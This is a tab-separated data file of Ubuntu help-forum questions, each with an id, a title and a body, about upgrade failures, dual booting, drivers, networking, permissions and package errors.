519628	want to open an editable pdf file which is showing error while opening on ubuntu 12.04	i am trying to open a editable pdf file on my ubuntu 12.04 , however getting following error '' please wait ... if this message is not eventually replaced by the proper contents of the document , your pdf viewer may not be able to display this type of document . you can upgrade to the latest version of adobe reader for windows速 , mac , or linux速 by visiting http : //www.adobe.com/products/acrobat/readstep2.html . for more assistance with adobe reader visit http : //www.adobe.com/support/products/ acrreader.html. `` this file can be opened through windows which my friend has it , but i am not able to open this . kindly advise and help . rgds viraj
519631	how to change subtitle color and other options in mencoder command line tool ?	i want to burn a subtitle file with .srt format in persian ( -utf8 ) into a video file with .mp4 format using mencoder . this command works for simple task : sudo mencoder input.mp4 -sub subtitle.srt -utf8 -o output.mp4 -oac pcm -ovc lavc now i want to change the color and font size of subtitle , and also add background to it . i 've seen some commands here , like -ass-color < value > , -sub-bg-color but 1-they do n't work , 2- i do n't want to convert .srt files to .ass . does anyone know how can i complete this line of command to do these changes i mentioned above ? any equal command in ffmpeg is also wellcomed . i 'm using mencoder just to avoid messing up with ffmpeg compiling process .
519632	ubuntu 14.04 dual boot with windows 8.1. failure	i have an hp pavilion g6 ( refer to image of the bios for the tech details ) bios version f.26 vendor : insyde which i want to dual boot ubuntu . i have done the following so far created a 150 gig partition where i intend to load the ubuntu burnt a live usb of the ubuntu 14 dsabled fast boot enables legacy boot in eufi disabled secureboot in eufi the trouble is for a reason yey unknown to me , the machine still boots straight into windows , and when i pressed f9 to select boot from eufi , it takes me to some folders where i get lost , these are the images of the machine and the error i got when i attempted to boot into eufi mode uui , [ acpi ( pnp0a03 , 0 ) /pci ( 1110 ) /ata ( primary , master ) /hdd ( part2 , sigf3753910-ca64-4c6c-8da2-9181c0556293 ) ]
519633	not able to upgrade 12.04 to 14.04.1	i want to upgrade 12.04.5 to 14.04.1 . i have already have windows 8 and 14.04 on this computer - just wanted to upgrade the 12.04.5 , too . when i try to upgrade it ( using both gi and terminal ) i get the following error : no valid mirror found while scanning your repository information no mirror entry for the upgrade was found . this can happen if you run an internal mirror or if the mirror information is out of date . do you want to rewrite your 'sources.list ' file anyway ? if you choose 'yes ' here it will update all 'precise ' to 'trusty ' entries . if you select 'no ' the upgrade will cancel . continue [ yn ] and even i said `` yes '' , i am getting the following errors : error during update a problem occurred during the update . this is usually some sort of network problem , please check your network connection and retry . w : failed to fetch http : //ppa.launchpad.net/langdalepl/gvfs-mtp/ubuntu/dists/trusty/main/source/sources 404 not found , w : failed to fetch http : //ppa.launchpad.net/langdalepl/gvfs-mtp/ubuntu/dists/trusty/main/binary-amd64/packages 404 not found , w : failed to fetch http : //ppa.launchpad.net/langdalepl/gvfs-mtp/ubuntu/dists/trusty/main/binary-i386/packages 404 not found , e : some index files failed to download . they have been ignored , or old ones used instead . restoring original system state could you assist ?
519635	wifi disconnects a lot while streaming media ubuntu 14.04	i have ubuntu 14.04 and the wifi is getting worse everyday . it disconnects a lot while video streaming . i have disabled power management as per the instructions ( sudo iwconfig iwconfig shows the following output- . vmnet8 no wireless extensions . ppp0 no wireless extensions . eth0 no wireless extensions . lo no wireless extensions . wlan0 ieee 802.11abgn essid : '' belkin.3ff9 '' mode : managed frequency:2.447 ghz access point : 94:44:52 : b7 : ef : f9 bit rate=150 mb/s tx-power=17 dbm retry long limit:7 rts thr : off fragment thr : off encryption key : off power management : off link quality=70/70 signal level=-37 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:4 invalid misc:1981 missed beacon:0 vmnet1 no wireless extensions . sudo egrep 'wlan|wpa|network ' /var/log/syslog | less < info > vpn connection 'vpn connection 1 ' ( ip4 config get ) reply received from old-style plugin . networkmanager [ 1116 ] : < info > tunnel device : ppp0 networkmanager [ 1116 ] : < info > ipv4 configuration : networkmanager [ 1116 ] : < info > internal prefix : 32 networkmanager [ 1116 ] : < info > internal point-to-point address : 192.168.1.151 networkmanager [ 1116 ] : < info > maximum segment size ( mss ) : 0 networkmanager [ 1116 ] : < info > forbid default route : no networkmanager [ 1116 ] : < info > internal dns : 192.168.1.10 networkmanager [ 1116 ] : < info > internal dns : 192.168.1.130 networkmanager [ 1116 ] : < info > dns domain : ' ( none ) ' networkmanager [ 1116 ] : < info > no ipv6 configuration networkmanager [ 1116 ] : < info > vpn connection 'vpn connection 1 ' ( ip config get ) complete . networkmanager [ 1116 ] : < info > policy set 'vpn connection 1 ' ( ppp0 ) as default for ipv4 routing and dns . networkmanager [ 1116 ] : < info > writing dns information to /sbin/resolvconf networkmanager [ 1116 ] : < info > vpn plugin state changed : started ( 4 ) networkmanager [ 1116 ] : < info > vpn plugin state changed : stopping ( 5 ) networkmanager [ 1116 ] : < info > vpn plugin state changed : stopped ( 6 ) networkmanager [ 1116 ] : < info > vpn plugin state change reason : 0 avahi-daemon [ 1080 ] : withdrawing address record for 192.168.2.3 on wlan0 . avahi-daemon [ 1080 ] : leaving mdns multicast group on interface wlan0.ipv4 with address avahi-daemon [ 1080 ] : interface wlan0.ipv4 no longer relevant for mdns . avahi-daemon [ 1080 ] : joining mdns multicast group on interface wlan0.ipv4 with address 192.168.2.3. avahi-daemon [ 1080 ] : new relevant interface wlan0.ipv4 for mdns . [ 1080 ] : registering new address record for 192.168.2.3 on wlan0.ipv4 . networkmanager [ 1116 ] : < info > policy set 'wifi.111 ' ( wlan0 ) as default for ipv4 routing and dns . networkmanager [ 1116 ] : < info > writing dns information to /sbin/resolvconf networkmanager [ 1116 ] : < warn > error disconnecting vpn : could not process the request because no vpn connection was active . networkmanager [ 1116 ] : < warn > ( 10 ) failed to find interface name for index networkmanager [ 1116 ] : nm_system_iface_flush_routes : assertion 'iface ! = null ' failed networkmanager [ 1116 ] : < warn > ( 10 ) failed to find interface name for index networkmanager [ 1116 ] : scplugin-ifupdown : devices removed ( path : /sys/devices/virtual/net/ppp0 , iface : ppp0 ) networkmanager [ 1116 ] : < info > vpn service 'pptp ' disappeared networkmanager [ 1116 ] : < info > starting vpn service 'pptp ' ... networkmanager [ 1116 ] : < info > vpn service 'pptp ' started ( org.freedesktop.networkmanager.pptp ) , pid 5009 networkmanager [ 1116 ] : < info > vpn service 'pptp ' appeared ; activating connections networkmanager [ 1116 ] : < info > vpn plugin state changed : starting ( 3 )
519636	how to drop/remove a published repo in aptly ?	this seems to be a prevalent issues which many are facing and there is n't a solution anywhere on the internet . i create a repo with my .deb packages and it is published , now my release file in the repo is corrupted , so i need to fix the release file , i want to drop the repo , but when i drop it , i get an error saying 'published repos can not be dropped ' . how to unpublish a repo and drop it , so that i can create a new repo with same distribution and publish again .
519638	hide terminal and still recieve input	i want to run a python script that basically uses the terminal for certain commands , but i do n't want it to show the terminal . i 've tried running the script as `` nohup file.py & '' this works and i can close the terminal after that but my script still has points where it wants to put input into the terminal , this is a problem because nohup stops all input . i was wondering if there was a way to make it so the terminal was hidden to the user but could still get input from my script through os.system ( ) ?
519640	ubuntu on nokia c5-00	how to install ubuntu on nokiac5-00 mobile.step wise step process of installation on nokia system symbian monile .
519642	live usb with openvpn	i would like to create an ubuntu 14.04 live usb to access a remote system . when plugged in a computer , it should constantly monitor if an internet connection is available . if it is , it should send me an email with it 's ip address so i can connect to it using openvpn . can anyone please advice me on how to do this ?
519649	change desktop configuration	i want to change my desktop to look and work like ubuntu 10 . there were icons across the ? title bar ? at the top of the desktop where you could choose applications , system , files & folders . i just upgraded to ubuntu 14 and ca n't find the icon for making multiple desktops . i do n't like the way the new desktop is organized . please help me .
519650	frequent crashes with nvidia 331.38 on xubuntu 14.04.1	fresh install of xubuntu 14.04.1 on a dell m4800 , 2 x 250gb ssds , 32gm ram . the display adapter is ( per lspci ) a `` nvidia corporation gk107glm [ quadro k1100m ] '' . default nouveau drivers were just ok and as i had a lot of display `` artifacting '' , i opted to install the standard nvidia proprietary drivers which are version 331.38 from `` additional drivers '' under `` software and updates '' . the performance of these drivers was exceptional - very fast . after restarting and seeming to work fine for a day , i now run into system crashes at least one an hour . sometimes i get a mouse freeze and a system hang with nothing to do but a hard power-off . even a ctrl-alt-f1 does n't work . sometimes x restarts and i am returned to the login prompt where i can log in again . very frustrating ... my question is this : as this was a clean install to begin with , are the closed source nvidia drivers unstable ? i see that nvidia has drivers with version 340.32 available , but i really do n't like to deploy drivers outside the ubuntu ecosystem . i am on nouveau now and i am coping with the display quality , but this is better than how frequently the closed source driver crashes . thoughts ? jim
519651	add workspaces with gnome classic and ubuntu 14.04	i 'm using ubuntu 14.04 with gnome classic . i want to add 4 workspaces . i right click into the workspaces ( left-bottom ) and go to preferences . i change the number of workspaces from 1 to 4 and close the window . no workspaces are added and when i press to preferences again , i see a 1 not a 4 .
519653	how do i run liveusb with persistence so it loads everything into ram and runs from that ?	noob here . i am looking for a way to use the 6 gigs of ram in my system . i am primarily using a live usb environment with persistence enabled . i was wondering if there is a way to have the os loaded into the ram , thus reducing read write to the pendrive ... . and yet retain persistence .
519657	firefox ca n't save download files on ntfs partition	ntfs partition is configured by ntfs configuration tool . other browser like chrome have no problem showing : '' the file could not be saved because you do not have the proper permissions . choose another save directory . '' any suggestions ?
519662	unable to find phonon library	i am trying to build an application that requires the phonon library ... i got an error because the lphonon was not found . so i tried to look for it ... there is no `` phonon '' on my system . i tried installing it sudo apt-get install libqt4-phonon sudo apt-get install libqt4-phonon-dev neither worked , so i tried sudo apt-get install phonon it worked ... and i was able to find it in \usr\lib\i386-linux-gnu , but the files i find are libphonon.so.4 and libphonon.so.4.6.0 i added this path in the project file unix : includepath += /usr/lib/i386-linux-gnu this was there before unix : qt += phonon do i have to change the name of the lib ? how can i make it work ?
519663	epson scanner , part of xp-310 printer , not working in ubuntu gnome 14.04	i finally got printer working , but the scanner is n't being recognized ... i have sane installed , but it is still as if i have no printer plugged in . `` no printer detected '' , any suggestions as to how to make my epson printer work ?
519664	youtube-dl ca n't download a playlist	i recently upgraded from ubuntu 12 to 14.xx , i always used to download a whole playlist before the upgrade but right after the up grade i ca n't download a playlist from youtube buut i can download individual videos .
519665	how to disable pop-up bar of open programs ?	frequently , a rectangular bar will pop up and show me the current open applications . i have no idea how it opens , i can not reproduce it , and it is incredibly annoying . sometimes it will switch apps , so for example , i 'll be on chrome and then it will pop up and display every open application , and switch to one of them , like files . sometimes it wo n't switch . i can not find how to disable it , and i ca n't reproduce it manually to take a screenshot . it will just happen . any ideas ?
519666	you do not have the permissions necessary to view the contents of `` folder ''	before i start explaining my problem ; i did n't have a problem and just open askubutnu and start writing my question , i have looked it up on multiple sites and none of the threads fit my situation . i had windows installed before and i have downloaded some files on windows and then installed backtrack 5 r3 as dual boot and copied the files on windows to bt when bt was booted , and it was succesful . ( also as could be guessed i always login as root on bt ) then i deleted windows and installed ubuntu 14.04 as dual boot and copied the files on bt to ubuntu . the problem is when i want to open or access the files on ubuntu when ubuntu is booted , i ca n't , i get the error message you do not have the permissions necessary to view the contents of âfilesâ . , i can however use the ls command with sudo as sudo ls files but cant use cd , when i try i get sudo : cd : command not found . the way i found that worked was to login root on terminal and open/access the files that way but it was n't efficient , i still could n't open the files via graphical file manager . then i looked it up on many threads and only thing i found that worked was sudo chmod go+rx files but the problem with this is ; it makesonly the 'files ' folder accessible , not the subfolders and if i try using the same command to the subfolders one by one it works but i got hundreds of subfolders wich also have subfolders in them . so i 'm asking if there 's a more practical way of doing it .
519668	change content of a file from the terminal	how can i change the content of a file from the terminal ? i do not want to use any application like a text editor , since i want to use it for a script . to give an example , i want to turn the file /etc/apache2/mods-enabled/dir.conf from this < ifmodule mod_dir.c > directoryindex index.html index.cgi index.pl index.php index.xhtml index.htm < /ifmodule > to this < ifmodule mod_dir.c > directoryindex index.php < /ifmodule >
519669	how to import messages from certain date into thunderbird	i have a e-mail archive in mbox format and need to import messages newer than the certain date to the thunderbird . as i do n't see any such option in thunderbird itself and the only add-in i 've found useful is importexporttools does n't have such option either . i guess this should be quite straightforward task in command line ( i.e . using formail ) but i can not find any useful examples on the net . i 'd appreciate any help in this matter .
519678	unity - 14.04 - set launcher icon size - via command line	i 've got a few computers , all coming to the end of their life . the first couple have gone and i find myself again having to re-install ubuntu on it 's resurrected remains and then laboriously reconfigure everything . so i 'm writing a couple of scripts to reconfigure the thing back to how i like it ... and install all the core programs i need to work . ideally i 'd do sudo ./install.sh walk away , make some tea and avoid the headache . so far i 've got : # turn on workspaces gsettings set org.compiz.core : /org/compiz/profiles/unity/plugins/core/ hsize 2 # turn on hide launcher gsettings set org.compiz.unityshell : /org/compiz/profiles/unity/plugins/unityshell/ launcher-hide-mode 1 could anyone advise how i 'd auto set launcher icon size to a number ( probably 36 in this case ) and similarly what the command would be for the auto hide launcher sensitivity .
519679	mac osx in vmware not connecting to the internet	i have mac osx mavericks running in vmware workstation ( 10.0.3 ) on my ubuntu 14.04 . my ubuntu host has no problems with internet connection , but the osx vm does not connect ( it used to work before , but i have n't used it in a while now ) . i ca n't tell why . i tried different configurations ( using nat or host-only or whathaveyou ) but nothing works . i scoured the internet for answers but i came up with nothing so far . help ?
519683	problem mounting usb stick	i am having a problem mounting my usb-stick device . i tried some of the most common solutions online but without success . the data on the drive are very important and i need to keep them . i think the problem originates from the fact that i messed the grub system file ( /etc/default/grub ) and the computer would not boot . so what i did was to boot in recovery mode > root commang window > mount -o remount , rw / > then edit grub to revert my changes . ( i may have forgotten the / in mount -o remount , rw / ) so after i update grub , i boot ubuntu as normally and my device will now not mount . its a 32 gb drive which was attached to the computer while the above process . i did try to mount it manually with no success . sudo fdisk -l returns disk /dev/sda : 256.1 gb , 256060514304 bytes 255 heads , 63 sectors/track , 31130 cylinders , total 500118192 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xc7812925 device boot start end blocks id system /dev/sda1 * 2048 304803839 152400896 83 linux disk /dev/sdb : 32.1 gb , 32128368640 bytes 64 heads , 32 sectors/track , 30640 cylinders , total 62750720 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x2fcdd958 disk /dev/sdb does n't contain a valid partition table also sudo mount /dev/sdb /media -t ntfs gives ntfs signature is missing . failed to mount '/dev/sdb ' : invalid argument the device '/dev/sdb ' does n't seem to have a valid ntfs . maybe the wrong device is used ? or the whole disk instead of a partition ( e.g . /dev/sda , not /dev/sda1 ) ? or the other way around ? ls -l /dev/sdb brw-rw -- -- 1 root disk 8 , 16 sep 3 15:36 /dev/sdb gparted has it as /dev/sdb : unrecognised disk label creating an image of the drive through disks gives 28 gb of unreadable data and a whole lot of nothing ... photorec gives back some of the files ( 1/10th ) but no names/structure . running ubuntu 14.04.1 freshly installed on a laptop . any help would be greatly appreciated . again i emphasize that the data on it are very important to me . thanks d. edit 1 : result of dmesg | tail -60 [ 1487.652711 ] cfg80211 : ( 5250000 khz - 5330000 khz @ 40000 khz ) , ( n/a , 2000 mbm ) [ 1487.652713 ] cfg80211 : ( 5490000 khz - 5710000 khz @ 40000 khz ) , ( n/a , 2700 mbm ) [ 1487.652716 ] cfg80211 : ( 57240000 khz - 65880000 khz @ 2160000 khz ) , ( n/a , 4000 mbm ) [ 1491.439298 ] toshiba_bluetooth : re-enabling toshiba bluetooth [ 1491.444092 ] usb 2-8 : usb disconnect , device number 73 [ 1491.778570 ] usb 2-8 : new full-speed usb device number 74 using xhci_hcd [ 1491.795853 ] usb 2-8 : new usb device found , idvendor=8087 , idproduct=07dc [ 1491.795862 ] usb 2-8 : new usb device strings : mfr=0 , product=0 , serialnumber=0 [ 1491.809440 ] bluetooth : hci0 : read intel version : 370710018002030d00 [ 1491.809476 ] bluetooth : hci0 : intel bluetooth firmware file : intel/ibt-hw-37.7.10-fw-1.80.2.3.d.bseq [ 1491.982447 ] bluetooth : hci0 : intel bluetooth firmware patch completed and activated [ 1496.445783 ] toshiba_bluetooth : re-enabling toshiba bluetooth [ 1496.449869 ] usb 2-8 : usb disconnect , device number 74 [ 1496.788759 ] usb 2-8 : new full-speed usb device number 75 using xhci_hcd [ 1496.806157 ] usb 2-8 : new usb device found , idvendor=8087 , idproduct=07dc [ 1496.806167 ] usb 2-8 : new usb device strings : mfr=0 , product=0 , serialnumber=0 [ 1496.819643 ] bluetooth : hci0 : read intel version : 370710018002030d00 [ 1496.819687 ] bluetooth : hci0 : intel bluetooth firmware file : intel/ibt-hw-37.7.10-fw-1.80.2.3.d.bseq [ 1496.992579 ] bluetooth : hci0 : intel bluetooth firmware patch completed and activated [ 1501.436158 ] toshiba_bluetooth : re-enabling toshiba bluetooth [ 1501.439980 ] usb 2-8 : usb disconnect , device number 75 [ 1501.778951 ] usb 2-8 : new full-speed usb device number 76 using xhci_hcd [ 1501.796333 ] usb 2-8 : new usb device found , idvendor=8087 , idproduct=07dc [ 1501.796343 ] usb 2-8 : new usb device strings : mfr=0 , product=0 , serialnumber=0 [ 1501.810822 ] bluetooth : hci0 : read intel version : 370710018002030d00 [ 1501.810862 ] bluetooth : hci0 : intel bluetooth firmware file : intel/ibt-hw-37.7.10-fw-1.80.2.3.d.bseq [ 1501.983839 ] bluetooth : hci0 : intel bluetooth firmware patch completed and activated [ 1504.978105 ] usb 3-4 : usb disconnect , device number 3 [ 1506.441712 ] toshiba_bluetooth : re-enabling toshiba bluetooth [ 1506.445751 ] usb 2-8 : usb disconnect , device number 76 [ 1506.785144 ] usb 2-8 : new full-speed usb device number 77 using xhci_hcd [ 1506.802502 ] usb 2-8 : new usb device found , idvendor=8087 , idproduct=07dc [ 1506.802512 ] usb 2-8 : new usb device strings : mfr=0 , product=0 , serialnumber=0 [ 1506.816991 ] bluetooth : hci0 : read intel version : 370710018002030d00 [ 1506.817017 ] bluetooth : hci0 : intel bluetooth firmware file : intel/ibt-hw-37.7.10-fw-1.80.2.3.d.bseq [ 1506.988013 ] bluetooth : hci0 : intel bluetooth firmware patch completed and activated [ 1511.432051 ] toshiba_bluetooth : re-enabling toshiba bluetooth [ 1511.435922 ] usb 2-8 : usb disconnect , device number 77 [ 1511.779340 ] usb 2-8 : new full-speed usb device number 78 using xhci_hcd [ 1511.796749 ] usb 2-8 : new usb device found , idvendor=8087 , idproduct=07dc [ 1511.796761 ] usb 2-8 : new usb device strings : mfr=0 , product=0 , serialnumber=0 [ 1511.811184 ] bluetooth : hci0 : read intel version : 370710018002030d00 [ 1511.811227 ] bluetooth : hci0 : intel bluetooth firmware file : intel/ibt-hw-37.7.10-fw-1.80.2.3.d.bseq [ 1511.983205 ] bluetooth : hci0 : intel bluetooth firmware patch completed and activated [ 1512.635339 ] usb 3-4 : new superspeed usb device number 4 using xhci_hcd [ 1512.651576 ] usb 3-4 : new usb device found , idvendor=1b1c , idproduct=1a03 [ 1512.651584 ] usb 3-4 : new usb device strings : mfr=1 , product=2 , serialnumber=3 [ 1512.651588 ] usb 3-4 : product : voyager 3.0 [ 1512.651591 ] usb 3-4 : manufacturer : corsair [ 1512.651594 ] usb 3-4 : serialnumber : 1101300000000886 [ 1512.652597 ] usb-storage 3-4:1.0 : usb mass storage device detected [ 1512.652735 ] scsi5 : usb-storage 3-4:1.0 [ 1513.650989 ] scsi 5:0:0:0 : direct-access corsair voyager 3.0 1.00 pq : 0 ansi : 5 [ 1513.651446 ] sd 5:0:0:0 : attached scsi generic sg1 type 0 [ 1513.653385 ] sd 5:0:0:0 : [ sdb ] 62750720 512-byte logical blocks : ( 32.1 gb/29.9 gib ) [ 1513.653543 ] sd 5:0:0:0 : [ sdb ] write protect is off [ 1513.653549 ] sd 5:0:0:0 : [ sdb ] mode sense : 23 00 00 00 [ 1513.653813 ] sd 5:0:0:0 : [ sdb ] write cache : disabled , read cache : disabled , does n't support dpo or fua [ 1513.656548 ] sdb : unknown partition table [ 1513.657533 ] sd 5:0:0:0 : [ sdb ] attached scsi removable disk edit 2 : trying to analyse with testdisk i get partition sector does n't have the endmark 0xaa55 quick search stops at : ( sdh here because i am on a different machine ) disk /dev/sdh - 32 gb / 29 gib - chs 30640 64 32 analyse cylinder 4095/30639 : 13 % and then read error at ... deeper search yields no results either . no partitions found eventually ... edit 3 : doing photorec for pdf file documents only stops here and then finishes ... pass 1 - reading sector 8354800/62750720 , 275 files found elapsed time 0h02m58s - estimated time to completion 0h19m18 pdf : 275 recovered
519688	unable to upgrade from 12.04 to 14.04	this is the error message i get : an unresolvable problem occurred while initializing the package information . please report this bug against the 'update-manager ' package and include the following error message : e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_precise_main_i18n_translation-en , e : the package lists or status file could not be parsed or opened . how do i force the upgrade to latest package . i am at 12.04 lts and want to go to 14.04.1 lts . the error message only allows me to close & when doing so closes all of the updater . from my past recollection there is a file i need to kill . i can not recall where & its name . what the other person wanted to do change the allowed download points . this machine being used to allow guest to access the internet so there is no risk of data lost . one machine did not have the problem and has been upgrading for about 3 hours .
519690	vmware closes when i try to play a virtual machine	i have just installed vmware player 6.0 and i can open it but when i hit the 'play virtual machine ' button it automatically closes . under permissions it says that permissions are owned by root but it also writes at the bottom `` you are not the owner , so you can not change these permissions . '' by the way i 'm using ubuntu 14.04 and have copied the virtual machine files from the backtrack installation i have on the same hard disk .
519691	internet problem	i have recently installed ubuntu 14.04 . whenever i switch on the computer it does not recognizes the wired connection and only after i restart the computer , the wired internet connection is detected . please help .
519694	gaming , mouse get crazy when left click	i am on kubuntu with an home built computer tower , i have a problem with my mouse , whenever i use the left button and do a small movement , the mouse get totally crazy , it makes in almost ( to not say every ) games , i tried ( minecraft , tf2 , cs.. ) . but on the desktop when i left click and move to make a small rectangle ( i dont know how we call that in english ) , i have no problems . thanks you advance for every ideas you could give me .
519695	inability to install ubuntu 14.04lts	okay , microsoft has been giving such a headache with this . i am attempting to dual-boot ubuntu 14.04lts onto my hp envy touchsmart , model 4-1105dx . i created the partition ( i have a gpt-kind partitions table ) . i 've followed every guide i can find about to disable secureboot and change my uefi settings . my computer wo n't allow me to disable uefi so i enabled legacy boot and still , no matter what i have done , whenever i go to install ubuntu , when i get to the 'installer type ' page , i get an empty table and no options to change anything . it does not show me my partitions , does n't give me any options . nothing . i 'm at my wits end . am i just missing something or am i doomed to windows forever ?
519696	twofinger scroll on lenovo g50	i recently switched from windows 8 to ubuntu 14.04 . with windows i could scroll pages using two fingers but this does not work running ubuntu . i have followed this guide : enable both edge scrolling and two-finger scrolling for touchpad but the commands only gives me the message : could n't find synaptics properties . no synaptics driver loaded ? any idea what to do ? regards
519697	troubles with starting ubuntu 14.04	i just recently installed ubuntu ubuntu 14.04 and i 've got a few questions and issues that some one might know how to solve . i worked on windows prior to this , so it 's a little difficult switching over with no experience in linux . ever so often my computer will freeze , once when i tried changing my screen settings when i had my tv plugged into my laptop . i change the setting from extended display to mirror display and that 's when the freeze occurred . i 'm learning computer science in school and we use a linux based server ( all text and no gui ) , so this is the reason why i switched to linux to really help me under programming a little bit more . so with that being said , is there any good recommendations for some good tutorials out there ? i 've tried to google a few but had a hard time finding something that i really understand . selecting which display driver for my computer and what do these options that i have mean to me ? i 've already installed my graphics card drivers and i am aware of my graphics card not being very compatible with linux , but maybe some one out there has gotten around this . is there any way to change the theme of everything other than the options that are there ( like some sort of customization , or downloadable theme ) and the option to move my launcher bar to the bottom of the screen ? computer specifications : memory : 8gb processor : intel core i5-3337u cpu @ 1.80ghz x 4 graphics : geforce gt70m/pcie/sse2 os type : 64-bit disk space : 750gb hdd if there 's anything else you need from my computer specs just let me know and i 'll get there to you asap .
519701	chromium crash shut down after latest update on 3rd sept 2014	after the latest update of chromium browser that happened on 3rd september , the chromium browser crashes each time i try opening google.com site or searching in the address bar . i removed chromium and re-installed it but the problem continues . it 's a nightmare ! i use 14.04 lts
519705	apt get upgrade third party modules and manually installed packages doubt	i 'm wonder what will happen to manually installed packages and kernel modules ( third party ones ) when doing an sudo apt-get upgrade .
519707	need to block xubuntu 12.04 to 14.04 upgrade with opendns	i have quite a few computers running xubuntu 12.04 and i may have forgot to disable the new version check on a few . what is the url that xubuntu uses to check for the 14.04.1 upgrade so i can add this to opendns and block the upgrade path ? the software we use does not work on 14.04 , so for now we have to stay with 12.04 . i figure blocking the url that it uses would be easier that checking 100 machines to see if they have long term release upgrades enables or not .
519711	unable to execute .out file	i have recently installed ubuntu 14.04 and i am not able to execute .out files in my folder . i am adding the output of various commands that i have tried . the file name is a_lena.out $ ls -l a_lena.out -rwxrwxr-x 1 gaurav gaurav 20966 aug 18 06:52 a_lena.out $ ./a_lena.out bash : ./a_lena.out : no such file or directory $ echo $ path /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /usr/local/games i was editing some configurations like : how to permanently save the brightness settings , downloading ppa on proxy , etc . may be i have messed up the system files . please let me know if some additonal information is needed . regards , gaurav ps : please also add suitable tags for this question . update i received this file , which is part of my assignment , from my friend . it is output file of an opencv program . i have n't compiled the file at my end . because it as output of opencv program , it is supposed to depend on opencv libraries ( i to have installed those files on my machine ) . the output of file command is : a_lena.out : elf 32-bit lsb executable , intel 80386 , version 1 ( sysv ) , dynamically linked ( uses shared libs ) , for gnu/linux 2.6.15 , buildid [ sha1 ] =6f48073f6000de3ec1fccc74bf5d5bbb29d24d6d , not stripped from the discussion going on , i am getting the intuition that the file needs to be compiled at my machine and i should not expect any .out file to be executable . please add some more clarification so that i do n't do this silly mistake anymore as i am a greenhorn . update 2 output of ldd is : not a dynamic executable output of dpkg-architecture is : deb_build_arch=amd64 deb_build_arch_bits=64 deb_build_arch_cpu=amd64 deb_build_arch_endian=little deb_build_arch_os=linux deb_build_gnu_cpu=x86_64 deb_build_gnu_system=linux-gnu deb_build_gnu_type=x86_64-linux-gnu deb_build_multiarch=x86_64-linux-gnu deb_host_arch=amd64 deb_host_arch_bits=64 deb_host_arch_cpu=amd64 deb_host_arch_endian=little deb_host_arch_os=linux deb_host_gnu_cpu=x86_64 deb_host_gnu_system=linux-gnu deb_host_gnu_type=x86_64-linux-gnu deb_host_multiarch=x86_64-linux-gnu
519712	trying to install nodejs but failing	i am trying to install nodejs but it is repeatedly failing . attached is the log $ sudo apt-get install nodejs reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : libc-ares2 libv8-3.14.5 use 'apt-get autoremove ' to remove them . the following extra packages will be installed : rlwrap the following new packages will be installed : rlwrap the following packages will be upgraded : nodejs 1 upgraded , 1 newly installed , 0 to remove and 11 not upgraded . need to get 0 b/4,391 kb of archives . after this operation , 14.9 mb of additional disk space will be used . do you want to continue ? [ y/n ] y selecting previously unselected package rlwrap . ( reading database ... 263979 files and directories currently installed . ) preparing to unpack ... /rlwrap_0.37-5_amd64.deb ... unpacking rlwrap ( 0.37-5 ) ... selecting previously unselected package nodejs . preparing to unpack ... /nodejs_0.10.31-1chl1~trusty1_amd64.deb ... unpacking nodejs ( 0.10.31-1chl1~trusty1 ) over ( 0.10.25~dfsg2-2ubuntu1 ) ... dpkg : error processing archive /var/cache/apt/archives/nodejs_0.10.31-1chl1~trusty1_amd64.deb ( -- unpack ) : trying to overwrite '/usr/share/man/man1/node.1.gz ' , which is also in package nodejs-legacy 0.10.25~dfsg2-2ubuntu1 dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) processing triggers for man-db ( 2.6.7.1-1 ) ... errors were encountered while processing : /var/cache/apt/archives/nodejs_0.10.31-1chl1~trusty1_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) can you guys please help me in getting this sorted . thanks !
519717	where can i find a list of ubuntu global events in the world ?	i 'd like to go to an event of ubuntu . i do n't care about the country or month . is there any wiki/web page where i could see all the ( specific ) ubuntu events in the world ? just global events like the ubuconla.org or ubucon.de thanks in advance !
519720	installation of vcp ( virtualcom ) driver	i want to install a vcp ( virtuacom ) port driver . i downloaded the driver form http : //www.ftdichip.com/drivers/vcp.htm and extracted the folder . in this folder there is a makefile , a rules.make , a ftdi_sio.c and a ftdi_sio.h . i read in some other blogs to execute the ./configure enter the command make sudo make install but there is no configure file and when i do the make command i get an error .
519723	404 errors when attempting to update using terminal	when i update using sudo apt-get update in terminal , i encounter 404 errors w : failed to fetch us.archive.ubuntu.com/ubuntu/dists/quantal-backports/multiverse/âś 404 not found [ ip : 91.189.91.13 80 ] e : some index files failed to download . they have been ignored , or old ones used instead . err us.archive.ubuntu.com quantal-backports/restricted i386 packages 404 not found [ ip : 91.189.91.13 80 ] err us.archive.ubuntu.com quantal-backports/universe i386 packages 404 not found [ ip : 91.189.91.13 80 ] err us.archive.ubuntu.com quantal-backports/multiverse i386 packages 404 not found [ ip : 91.189.91.13 80 ] ign us.archive.ubuntu.com quantal-backports/main translation-en_us
519724	how to backup and restore sources when upgrading to a newer version ?	if i copy/paste the /etc/apt dir or just sources.list for that matter to a newer version , i will still have sources named for the old version ( saucy for axample ) which is not right . for example : deb http : //si.archive.ubuntu.com/ubuntu/ saucy universe has to be now like : deb http : //si.archive.ubuntu.com/ubuntu/ trusty universe is there a `` correct '' way of importing/exporting sources or i have to write a script for renaming the words ?
